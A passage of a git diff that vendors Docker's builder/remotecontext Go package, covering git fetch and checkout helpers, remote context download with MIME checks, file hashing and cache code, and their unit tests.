+		args = append(args, "--depth", "1")
+	}
+
+	return append(args, "origin", ref)
+}
+
+// Check if a given git URL supports a shallow git clone,
+// i.e. it is a non-HTTP server or a smart HTTP server.
+func supportsShallowClone(remoteURL string) bool {
+	if urlutil.IsURL(remoteURL) {
+		// Check if the HTTP server is smart
+
+		// Smart servers must correctly respond to a query for the git-upload-pack service
+		serviceURL := remoteURL + "/info/refs?service=git-upload-pack"
+
+		// Try a HEAD request and fallback to a Get request on error
+		res, err := http.Head(serviceURL)
+		if err != nil || res.StatusCode != http.StatusOK {
+			res, err = http.Get(serviceURL)
+			if err == nil {
+				res.Body.Close()
+			}
+			if err != nil || res.StatusCode != http.StatusOK {
+				// request failed
+				return false
+			}
+		}
+
+		if res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" {
+			// Fallback, not a smart server
+			return false
+		}
+		return true
+	}
+	// Non-HTTP protocols always support shallow clones
+	return true
+}
+
+func checkoutGit(root, ref, subdir string) (string, error) {
+	// Try checking out by ref name first. This will work on branches and sets
+	// .git/HEAD to the current branch name
+	if output, err := gitWithinDir(root, "checkout", ref); err != nil {
+		// If checking out by branch name fails check out the last fetched ref
+		if _, err2 := gitWithinDir(root, "checkout", "FETCH_HEAD"); err2 != nil {
+			return "", errors.Wrapf(err, "error checking out %s: %s", ref, output)
+		}
+	}
+
+	if subdir != "" {
+		newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, subdir), root)
+		if err != nil {
+			return "", errors.Wrapf(err, "error setting git context, %q not within git root", subdir)
+		}
+
+		fi, err := os.Stat(newCtx)
+		if err != nil {
+			return "", err
+		}
+		if !fi.IsDir() {
+			return "", errors.Errorf("error setting git context, not a directory: %s", newCtx)
+		}
+		root = newCtx
+	}
+
+	return root, nil
+}
+
+func gitWithinDir(dir string, args ...string) ([]byte, error) {
+	a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")}
+	return git(append(a, args...)...)
+}
+
+func git(args ...string) ([]byte, error) {
+	return exec.Command("git", args...).CombinedOutput()
+}
+
+// isGitTransport returns true if the provided str is a git transport by inspecting
+// the prefix of the string for known protocols used in git.
+func isGitTransport(str string) bool {
+	return urlutil.IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@")
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go
new file mode 100644
index 0000000000..8c39679081
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go
@@ -0,0 +1,278 @@
+package git // import "github.com/docker/docker/builder/remotecontext/git"
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/google/go-cmp/cmp"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestParseRemoteURL(t *testing.T) {
+	dir, err := parseRemoteURL("git://github.com/user/repo.git")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(gitRepo{"git://github.com/user/repo.git", "master", ""}, dir, cmpGitRepoOpt))
+
+	dir, err = parseRemoteURL("git://github.com/user/repo.git#mybranch:mydir/mysubdir/")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(gitRepo{"git://github.com/user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt))
+
+	dir, err = parseRemoteURL("https://github.com/user/repo.git")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(gitRepo{"https://github.com/user/repo.git", "master", ""}, dir, cmpGitRepoOpt))
+
+	dir, err = parseRemoteURL("https://github.com/user/repo.git#mybranch:mydir/mysubdir/")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(gitRepo{"https://github.com/user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt))
+
+	dir, err = parseRemoteURL("git@github.com:user/repo.git")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(gitRepo{"git@github.com:user/repo.git", "master", ""}, dir, cmpGitRepoOpt))
+
+	dir, err = parseRemoteURL("git@github.com:user/repo.git#mybranch:mydir/mysubdir/")
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(gitRepo{"git@github.com:user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt))
+}
+
+var cmpGitRepoOpt = cmp.AllowUnexported(gitRepo{})
+
+func TestCloneArgsSmartHttp(t *testing.T) {
+	mux := http.NewServeMux()
+	server := httptest.NewServer(mux)
+	serverURL, _ := url.Parse(server.URL)
+
+	serverURL.Path = "/repo.git"
+
+	mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) {
+		q := r.URL.Query().Get("service")
+		w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q))
+	})
+
+	args := fetchArgs(serverURL.String(), "master")
+	exp := []string{"fetch", "--depth", "1", "origin", "master"}
+	assert.Check(t, is.DeepEqual(exp, args))
+}
+
+func TestCloneArgsDumbHttp(t *testing.T) {
+	mux := http.NewServeMux()
+	server := httptest.NewServer(mux)
+	serverURL, _ := url.Parse(server.URL)
+
+	serverURL.Path = "/repo.git"
+
+	mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/plain")
+	})
+
+	args := fetchArgs(serverURL.String(), "master")
+	exp := []string{"fetch", "origin", "master"}
+	assert.Check(t, is.DeepEqual(exp, args))
+}
+
+func TestCloneArgsGit(t *testing.T) {
+	args := fetchArgs("git://github.com/docker/docker", "master")
+	exp := []string{"fetch", "--depth", "1", "origin", "master"}
+	assert.Check(t, is.DeepEqual(exp, args))
+}
+
+func gitGetConfig(name string) string {
+	b, err := git([]string{"config", "--get", name}...)
+	if err != nil {
+		// since we are interested in empty or non empty string,
+		// we can safely ignore the err here.
+		return ""
+	}
+	return strings.TrimSpace(string(b))
+}
+
+func TestCheckoutGit(t *testing.T) {
+	root, err := ioutil.TempDir("", "docker-build-git-checkout")
+	assert.NilError(t, err)
+	defer os.RemoveAll(root)
+
+	autocrlf := gitGetConfig("core.autocrlf")
+	if !(autocrlf == "true" || autocrlf == "false" ||
+		autocrlf == "input" || autocrlf == "") {
+		t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf)
+	}
+	eol := "\n"
+	if autocrlf == "true" {
+		eol = "\r\n"
+	}
+
+	gitDir := filepath.Join(root, "repo")
+	_, err = git("init", gitDir)
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "config", "user.name", "Docker test")
+	assert.NilError(t, err)
+
+	err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644)
+	assert.NilError(t, err)
+
+	subDir := filepath.Join(gitDir, "subdir")
+	assert.NilError(t, os.Mkdir(subDir, 0755))
+
+	err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644)
+	assert.NilError(t, err)
+
+	if runtime.GOOS != "windows" {
+		if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil {
+			t.Fatal(err)
+		}
+
+		if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	_, err = gitWithinDir(gitDir, "add", "-A")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "commit", "-am", "First commit")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "checkout", "-b", "test")
+	assert.NilError(t, err)
+
+	err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644)
+	assert.NilError(t, err)
+
+	err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644)
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "add", "-A")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "checkout", "master")
+	assert.NilError(t, err)
+
+	// set up submodule
+	subrepoDir := filepath.Join(root, "subrepo")
+	_, err = git("init", subrepoDir)
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(subrepoDir, "config", "user.email", "test@docker.com")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(subrepoDir, "config", "user.name", "Docker test")
+	assert.NilError(t, err)
+
+	err = ioutil.WriteFile(filepath.Join(subrepoDir, "subfile"), []byte("subcontents"), 0644)
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(subrepoDir, "add", "-A")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(subrepoDir, "commit", "-am", "Subrepo initial")
+	assert.NilError(t, err)
+
+	cmd := exec.Command("git", "submodule", "add", subrepoDir, "sub") // this command doesn't work with --work-tree
+	cmd.Dir = gitDir
+	assert.NilError(t, cmd.Run())
+
+	_, err = gitWithinDir(gitDir, "add", "-A")
+	assert.NilError(t, err)
+
+	_, err = gitWithinDir(gitDir, "commit", "-am", "With submodule")
+	assert.NilError(t, err)
+
+	type singleCase struct {
+		frag      string
+		exp       string
+		fail      bool
+		submodule bool
+	}
+
+	cases := []singleCase{
+		{"", "FROM scratch", false, true},
+		{"master", "FROM scratch", false, true},
+		{":subdir", "FROM scratch" + eol + "EXPOSE 5000", false, false},
+		{":nosubdir", "", true, false},   // missing directory error
+		{":Dockerfile", "", true, false}, // not a directory error
+		{"master:nosubdir", "", true, false},
+		{"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false, false},
+		{"master:../subdir", "", true, false},
+		{"test", "FROM scratch" + eol + "EXPOSE 3000", false, false},
+		{"test:", "FROM scratch" + eol + "EXPOSE 3000", false, false},
+		{"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false, false},
+	}
+
+	if runtime.GOOS != "windows" {
+		// Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. Sample output below
+		// 	git --work-tree .\repo --git-dir .\repo\.git add -A
+		//	error: readlink("absolutelink"): Function not implemented
+		// 	error: unable to index file absolutelink
+		// 	fatal: adding files failed
+		cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false})
+		cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false})
+	}
+
+	for _, c := range cases {
+		ref, subdir := getRefAndSubdir(c.frag)
+		r, err := cloneGitRepo(gitRepo{remote: gitDir, ref: ref, subdir: subdir})
+
+		if c.fail {
+			assert.Check(t, is.ErrorContains(err, ""))
+			continue
+		}
+		assert.NilError(t, err)
+		defer os.RemoveAll(r)
+		if c.submodule {
+			b, err := ioutil.ReadFile(filepath.Join(r, "sub/subfile"))
+			assert.NilError(t, err)
+			assert.Check(t, is.Equal("subcontents", string(b)))
+		} else {
+			_, err := os.Stat(filepath.Join(r, "sub/subfile"))
+			assert.Assert(t, is.ErrorContains(err, ""))
+			assert.Assert(t, os.IsNotExist(err))
+		}
+
+		b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile"))
+		assert.NilError(t, err)
+		assert.Check(t, is.Equal(c.exp, string(b)))
+	}
+}
+
+func TestValidGitTransport(t *testing.T) {
+	gitUrls := []string{
+		"git://github.com/docker/docker",
+		"git@github.com:docker/docker.git",
+		"git@bitbucket.org:atlassianlabs/atlassian-docker.git",
+		"https://github.com/docker/docker.git",
+		"http://github.com/docker/docker.git",
+		"http://github.com/docker/docker.git#branch",
+		"http://github.com/docker/docker.git#:dir",
+	}
+	incompleteGitUrls := []string{
+		"github.com/docker/docker",
+	}
+
+	for _, url := range gitUrls {
+		if !isGitTransport(url) {
+			t.Fatalf("%q should be detected as valid Git prefix", url)
+		}
+	}
+
+	for _, url := range incompleteGitUrls {
+		if isGitTransport(url) {
+			t.Fatalf("%q should not be detected as valid Git prefix", url)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go b/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go
new file mode 100644
index 0000000000..442cecad85
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go
@@ -0,0 +1,102 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"encoding/hex"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/pools"
+	"github.com/pkg/errors"
+)
+
+// NewLazySource creates a new LazyContext. LazyContext defines a hashed build
+// context based on a root directory. Individual files are hashed first time
+// they are asked. It is not safe to call methods of LazyContext concurrently.
+func NewLazySource(root containerfs.ContainerFS) (builder.Source, error) {
+	return &lazySource{
+		root: root,
+		sums: make(map[string]string),
+	}, nil
+}
+
+type lazySource struct {
+	root containerfs.ContainerFS
+	sums map[string]string
+}
+
+func (c *lazySource) Root() containerfs.ContainerFS {
+	return c.root
+}
+
+func (c *lazySource) Close() error {
+	return nil
+}
+
+func (c *lazySource) Hash(path string) (string, error) {
+	cleanPath, fullPath, err := normalize(path, c.root)
+	if err != nil {
+		return "", err
+	}
+
+	relPath, err := Rel(c.root, fullPath)
+	if err != nil {
+		return "", errors.WithStack(convertPathError(err, cleanPath))
+	}
+
+	fi, err := os.Lstat(fullPath)
+	if err != nil {
+		// Backwards compatibility: a missing file returns a path as hash.
+		// This is reached in the case of a broken symlink.
+		return relPath, nil
+	}
+
+	sum, ok := c.sums[relPath]
+	if !ok {
+		sum, err = c.prepareHash(relPath, fi)
+		if err != nil {
+			return "", err
+		}
+	}
+
+	return sum, nil
+}
+
+func (c *lazySource) prepareHash(relPath string, fi os.FileInfo) (string, error) {
+	p := c.root.Join(c.root.Path(), relPath)
+	h, err := NewFileHash(p, relPath, fi)
+	if err != nil {
+		return "", errors.Wrapf(err, "failed to create hash for %s", relPath)
+	}
+	if fi.Mode().IsRegular() && fi.Size() > 0 {
+		f, err := c.root.Open(p)
+		if err != nil {
+			return "", errors.Wrapf(err, "failed to open %s", relPath)
+		}
+		defer f.Close()
+		if _, err := pools.Copy(h, f); err != nil {
+			return "", errors.Wrapf(err, "failed to copy file data for %s", relPath)
+		}
+	}
+	sum := hex.EncodeToString(h.Sum(nil))
+	c.sums[relPath] = sum
+	return sum, nil
+}
+
+// Rel makes a path relative to base path. Same as `filepath.Rel` but can also
+// handle UUID paths in windows.
+func Rel(basepath containerfs.ContainerFS, targpath string) (string, error) {
+	// filepath.Rel can't handle UUID paths in windows
+	if basepath.OS() == "windows" {
+		pfx := basepath.Path() + `\`
+		if strings.HasPrefix(targpath, pfx) {
+			p := strings.TrimPrefix(targpath, pfx)
+			if p == "" {
+				p = "."
+			}
+			return p, nil
+		}
+	}
+	return basepath.Rel(basepath.Path(), targpath)
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go b/vendor/github.com/docker/docker/builder/remotecontext/mimetype.go
similarity index 63%
rename from vendor/github.com/docker/docker/pkg/httputils/mimetype.go
rename to vendor/github.com/docker/docker/builder/remotecontext/mimetype.go
index d5cf34e4f2..e8a6210e9c 100644
--- a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go
+++ b/vendor/github.com/docker/docker/builder/remotecontext/mimetype.go
@@ -1,30 +1,27 @@
-package httputils
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
 
 import (
 	"mime"
 	"net/http"
 )
 
-// MimeTypes stores the MIME content type.
-var MimeTypes = struct {
+// mimeTypes stores the MIME content type.
+var mimeTypes = struct {
 	TextPlain   string
-	Tar         string
 	OctetStream string
-}{"text/plain", "application/tar", "application/octet-stream"}
+}{"text/plain", "application/octet-stream"}
 
-// DetectContentType returns a best guess representation of the MIME
+// detectContentType returns a best guess representation of the MIME
 // content type for the bytes at c.  The value detected by
 // http.DetectContentType is guaranteed not be nil, defaulting to
 // application/octet-stream when a better guess cannot be made. The
 // result of this detection is then run through mime.ParseMediaType()
 // which separates the actual MIME string from any parameters.
-func DetectContentType(c []byte) (string, map[string]string, error) {
-
+func detectContentType(c []byte) (string, map[string]string, error) {
 	ct := http.DetectContentType(c)
 	contentType, args, err := mime.ParseMediaType(ct)
 	if err != nil {
 		return "", nil, err
 	}
-
 	return contentType, args, nil
 }
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go b/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go
new file mode 100644
index 0000000000..df9c378770
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go
@@ -0,0 +1,16 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestDetectContentType(t *testing.T) {
+	input := []byte("That is just a plain text")
+
+	contentType, _, err := detectContentType(input)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("text/plain", contentType))
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/remote.go b/vendor/github.com/docker/docker/builder/remotecontext/remote.go
new file mode 100644
index 0000000000..1fb80549b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/remote.go
@@ -0,0 +1,127 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/url"
+	"regexp"
+
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/pkg/errors"
+)
+
+// When downloading remote contexts, limit the amount (in bytes)
+// to be read from the response body in order to detect its Content-Type
+const maxPreambleLength = 100
+
+const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))`
+
+var mimeRe = regexp.MustCompile(acceptableRemoteMIME)
+
+// downloadRemote context from a url and returns it, along with the parsed content type
+func downloadRemote(remoteURL string) (string, io.ReadCloser, error) {
+	response, err := GetWithStatusError(remoteURL)
+	if err != nil {
+		return "", nil, errors.Wrapf(err, "error downloading remote context %s", remoteURL)
+	}
+
+	contentType, contextReader, err := inspectResponse(
+		response.Header.Get("Content-Type"),
+		response.Body,
+		response.ContentLength)
+	if err != nil {
+		response.Body.Close()
+		return "", nil, errors.Wrapf(err, "error detecting content type for remote %s", remoteURL)
+	}
+
+	return contentType, ioutils.NewReadCloserWrapper(contextReader, response.Body.Close), nil
+}
+
+// GetWithStatusError does an http.Get() and returns an error if the
+// status code is 4xx or 5xx.
+func GetWithStatusError(address string) (resp *http.Response, err error) {
+	if resp, err = http.Get(address); err != nil {
+		if uerr, ok := err.(*url.Error); ok {
+			if derr, ok := uerr.Err.(*net.DNSError); ok && !derr.IsTimeout {
+				return nil, errdefs.NotFound(err)
+			}
+		}
+		return nil, errdefs.System(err)
+	}
+	if resp.StatusCode < 400 {
+		return resp, nil
+	}
+	msg := fmt.Sprintf("failed to GET %s with status %s", address, resp.Status)
+	body, err := ioutil.ReadAll(resp.Body)
+	resp.Body.Close()
+	if err != nil {
+		return nil, errdefs.System(errors.New(msg + ": error reading body"))
+	}
+
+	msg += ": " + string(bytes.TrimSpace(body))
+	switch resp.StatusCode {
+	case http.StatusNotFound:
+		return nil, errdefs.NotFound(errors.New(msg))
+	case http.StatusBadRequest:
+		return nil, errdefs.InvalidParameter(errors.New(msg))
+	case http.StatusUnauthorized:
+		return nil, errdefs.Unauthorized(errors.New(msg))
+	case http.StatusForbidden:
+		return nil, errdefs.Forbidden(errors.New(msg))
+	}
+	return nil, errdefs.Unknown(errors.New(msg))
+}
+
+// inspectResponse looks into the http response data at r to determine whether its
+// content-type is on the list of acceptable content types for remote build contexts.
+// This function returns:
+//    - a string representation of the detected content-type
+//    - an io.Reader for the response body
+//    - an error value which will be non-nil either when something goes wrong while
+//      reading bytes from r or when the detected content-type is not acceptable.
+func inspectResponse(ct string, r io.Reader, clen int64) (string, io.Reader, error) {
+	plen := clen
+	if plen <= 0 || plen > maxPreambleLength {
+		plen = maxPreambleLength
+	}
+
+	preamble := make([]byte, plen)
+	rlen, err := r.Read(preamble)
+	if rlen == 0 {
+		return ct, r, errors.New("empty response")
+	}
+	if err != nil && err != io.EOF {
+		return ct, r, err
+	}
+
+	preambleR := bytes.NewReader(preamble[:rlen])
+	bodyReader := io.MultiReader(preambleR, r)
+	// Some web servers will use application/octet-stream as the default
+	// content type for files without an extension (e.g. 'Dockerfile')
+	// so if we receive this value we better check for text content
+	contentType := ct
+	if len(ct) == 0 || ct == mimeTypes.OctetStream {
+		contentType, _, err = detectContentType(preamble)
+		if err != nil {
+			return contentType, bodyReader, err
+		}
+	}
+
+	contentType = selectAcceptableMIME(contentType)
+	var cterr error
+	if len(contentType) == 0 {
+		cterr = fmt.Errorf("unsupported Content-Type %q", ct)
+		contentType = ct
+	}
+
+	return contentType, bodyReader, cterr
+}
+
+func selectAcceptableMIME(ct string) string {
+	return mimeRe.FindString(ct)
+}
diff --git a/vendor/github.com/docker/docker/builder/remote_test.go b/vendor/github.com/docker/docker/builder/remotecontext/remote_test.go
similarity index 62%
rename from vendor/github.com/docker/docker/builder/remote_test.go
rename to vendor/github.com/docker/docker/builder/remotecontext/remote_test.go
index 691a084761..a0101f7493 100644
--- a/vendor/github.com/docker/docker/builder/remote_test.go
+++ b/vendor/github.com/docker/docker/builder/remotecontext/remote_test.go
@@ -1,4 +1,4 @@
-package builder
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
 
 import (
 	"bytes"
@@ -9,8 +9,10 @@ import (
 	"net/url"
 	"testing"
 
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/httputils"
+	"github.com/docker/docker/builder"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
 )
 
 var binaryContext = []byte{0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00} //xz magic
@@ -53,7 +55,7 @@ func TestInspectEmptyResponse(t *testing.T) {
 	br := ioutil.NopCloser(bytes.NewReader([]byte("")))
 	contentType, bReader, err := inspectResponse(ct, br, 0)
 	if err == nil {
-		t.Fatalf("Should have generated an error for an empty response")
+		t.Fatal("Should have generated an error for an empty response")
 	}
 	if contentType != "application/octet-stream" {
 		t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType)
@@ -151,63 +153,90 @@ func TestInspectResponseEmptyContentType(t *testing.T) {
 	}
 }
 
-func TestMakeRemoteContext(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
+func TestUnknownContentLength(t *testing.T) {
+	content := []byte(dockerfileContents)
+	ct := "text/plain"
+	br := ioutil.NopCloser(bytes.NewReader(content))
+	contentType, bReader, err := inspectResponse(ct, br, -1)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if contentType != "text/plain" {
+		t.Fatalf("Content type should be 'text/plain' but is %q", contentType)
+	}
+	body, err := ioutil.ReadAll(bReader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(body) != dockerfileContents {
+		t.Fatalf("Corrupted response body %s", body)
+	}
+}
 
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+func TestDownloadRemote(t *testing.T) {
+	contextDir := fs.NewDir(t, "test-builder-download-remote",
+		fs.WithFile(builder.DefaultDockerfileName, dockerfileContents))
+	defer contextDir.Remove()
 
 	mux := http.NewServeMux()
 	server := httptest.NewServer(mux)
 	serverURL, _ := url.Parse(server.URL)
 
-	serverURL.Path = "/" + DefaultDockerfileName
+	serverURL.Path = "/" + builder.DefaultDockerfileName
 	remoteURL := serverURL.String()
 
-	mux.Handle("/", http.FileServer(http.Dir(contextDir)))
+	mux.Handle("/", http.FileServer(http.Dir(contextDir.Path())))
 
-	remoteContext, err := MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){
-		httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) {
-			dockerfile, err := ioutil.ReadAll(rc)
-			if err != nil {
-				return nil, err
-			}
+	contentType, content, err := downloadRemote(remoteURL)
+	assert.NilError(t, err)
 
-			r, err := archive.Generate(DefaultDockerfileName, string(dockerfile))
-			if err != nil {
-				return nil, err
-			}
-			return ioutil.NopCloser(r), nil
-		},
-	})
-
-	if err != nil {
-		t.Fatalf("Error when executing DetectContextFromRemoteURL: %s", err)
-	}
-
-	if remoteContext == nil {
-		t.Fatalf("Remote context should not be nil")
-	}
-
-	tarSumCtx, ok := remoteContext.(*tarSumContext)
-
-	if !ok {
-		t.Fatalf("Cast error, remote context should be casted to tarSumContext")
-	}
-
-	fileInfoSums := tarSumCtx.sums
+	assert.Check(t, is.Equal(mimeTypes.TextPlain, contentType))
+	raw, err := ioutil.ReadAll(content)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(dockerfileContents, string(raw)))
+}
 
-	if fileInfoSums.Len() != 1 {
-		t.Fatalf("Size of file info sums should be 1, got: %d", fileInfoSums.Len())
+func TestGetWithStatusError(t *testing.T) {
+	var testcases = []struct {
+		err          error
+		statusCode   int
+		expectedErr  string
+		expectedBody string
+	}{
+		{
+			statusCode:   200,
+			expectedBody: "THE BODY",
+		},
+		{
+			statusCode:   400,
+			expectedErr:  "with status 400 Bad Request: broke",
+			expectedBody: "broke",
+		},
 	}
-
-	fileInfo := fileInfoSums.GetFile(DefaultDockerfileName)
-
-	if fileInfo == nil {
-		t.Fatalf("There should be file named %s in fileInfoSums", DefaultDockerfileName)
+	for _, testcase := range testcases {
+		ts := httptest.NewServer(
+			http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+				buffer := bytes.NewBufferString(testcase.expectedBody)
+				w.WriteHeader(testcase.statusCode)
+				w.Write(buffer.Bytes())
+			}),
+		)
+		defer ts.Close()
+		response, err := GetWithStatusError(ts.URL)
+
+		if testcase.expectedErr == "" {
+			assert.NilError(t, err)
+
+			body, err := readBody(response.Body)
+			assert.NilError(t, err)
+			assert.Check(t, is.Contains(string(body), testcase.expectedBody))
+		} else {
+			assert.Check(t, is.ErrorContains(err, testcase.expectedErr))
+		}
 	}
+}
 
-	if fileInfo.Pos() != 0 {
-		t.Fatalf("File %s should have position 0, got %d", DefaultDockerfileName, fileInfo.Pos())
-	}
+func readBody(b io.ReadCloser) ([]byte, error) {
+	defer b.Close()
+	return ioutil.ReadAll(b)
 }
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go
new file mode 100644
index 0000000000..b809cfb78b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go
@@ -0,0 +1,157 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"os"
+	"sync"
+
+	"github.com/docker/docker/pkg/containerfs"
+	iradix "github.com/hashicorp/go-immutable-radix"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+	"github.com/tonistiigi/fsutil"
+)
+
+type hashed interface {
+	Digest() digest.Digest
+}
+
+// CachableSource is a source that contains cache records for its contents
+type CachableSource struct {
+	mu   sync.Mutex
+	root containerfs.ContainerFS
+	tree *iradix.Tree
+	txn  *iradix.Txn
+}
+
+// NewCachableSource creates new CachableSource
+func NewCachableSource(root string) *CachableSource {
+	ts := &CachableSource{
+		tree: iradix.New(),
+		root: containerfs.NewLocalContainerFS(root),
+	}
+	return ts
+}
+
+// MarshalBinary marshals current cache information to a byte array
+func (cs *CachableSource) MarshalBinary() ([]byte, error) {
+	b := TarsumBackup{Hashes: make(map[string]string)}
+	root := cs.getRoot()
+	root.Walk(func(k []byte, v interface{}) bool {
+		b.Hashes[string(k)] = v.(*fileInfo).sum
+		return false
+	})
+	return b.Marshal()
+}
+
+// UnmarshalBinary decodes cache information for presented byte array
+func (cs *CachableSource) UnmarshalBinary(data []byte) error {
+	var b TarsumBackup
+	if err := b.Unmarshal(data); err != nil {
+		return err
+	}
+	txn := iradix.New().Txn()
+	for p, v := range b.Hashes {
+		txn.Insert([]byte(p), &fileInfo{sum: v})
+	}
+	cs.mu.Lock()
+	defer cs.mu.Unlock()
+	cs.tree = txn.Commit()
+	return nil
+}
+
+// Scan rescans the cache information from the file system
+func (cs *CachableSource) Scan() error {
+	lc, err := NewLazySource(cs.root)
+	if err != nil {
+		return err
+	}
+	txn := iradix.New().Txn()
+	err = cs.root.Walk(cs.root.Path(), func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			return errors.Wrapf(err, "failed to walk %s", path)
+		}
+		rel, err := Rel(cs.root, path)
+		if err != nil {
+			return err
+		}
+		h, err := lc.Hash(rel)
+		if err != nil {
+			return err
+		}
+		txn.Insert([]byte(rel), &fileInfo{sum: h})
+		return nil
+	})
+	if err != nil {
+		return err
+	}
+	cs.mu.Lock()
+	defer cs.mu.Unlock()
+	cs.tree = txn.Commit()
+	return nil
+}
+
+// HandleChange notifies the source about a modification operation
+func (cs *CachableSource) HandleChange(kind fsutil.ChangeKind, p string, fi os.FileInfo, err error) (retErr error) {
+	cs.mu.Lock()
+	if cs.txn == nil {
+		cs.txn = cs.tree.Txn()
+	}
+	if kind == fsutil.ChangeKindDelete {
+		cs.txn.Delete([]byte(p))
+		cs.mu.Unlock()
+		return
+	}
+
+	h, ok := fi.(hashed)
+	if !ok {
+		cs.mu.Unlock()
